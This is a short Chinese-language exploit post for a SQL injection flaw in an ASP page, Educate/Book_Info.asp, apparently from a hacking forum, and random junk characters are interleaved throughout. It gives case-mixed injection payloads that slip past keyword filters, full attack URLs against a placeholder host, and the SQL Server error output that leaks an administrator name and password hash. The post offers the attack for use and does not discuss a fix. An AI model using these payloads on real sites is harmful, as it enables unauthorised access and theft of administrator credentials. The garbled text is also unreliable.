漏洞出现在Educate/Book_Info.asp
. O k6 n' H% d5 r+ H, w
# M3 I( A- ]/ }此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
6 T) d5 y. L- X
6 w5 ~ U- W3 A; `4 F% p5 a* Uexp:如下
. f6 Y1 w2 p- | Z* Q+ R$ h! I3 m查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)8 i- s4 i" x" h' w
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
3 |6 p0 F3 X# R( O1 ` V
8 p, d8 B9 Q( |- q/ n e0 u8 Bhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
" c e$ y+ r4 S0 f$ X& m' v; P
- |3 w$ h1 V1 O5 ~Microsoft OLE DB Provider for SQL Server 错误 '80040e07'7 W9 @0 t& B1 `& n8 S, M$ Z% T
R, U. E( f7 |
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
, [& m1 b8 g, S
1 S! y" [" P* t, {' K4 P8 t/Educate/Book_Info.asp,行 8
2 Q5 W" _5 R4 y
4 X! u# @9 ~8 I6 W/ m* p6 lhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
1 R6 R3 [1 K" Y
) E; {- {. y+ \/ c% fMicrosoft OLE DB Provider for SQL Server 错误 '80040e07': F6 m5 z+ D: |: ^
' W2 w) h1 ~1 }' z6 M1 |5 `将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
2 A' t1 \$ d. z* M1 o
3 i5 M: [, O5 `+ o, y8 a i/Educate/Book_Info.asp,行 84 s; {4 F9 J$ S) d
|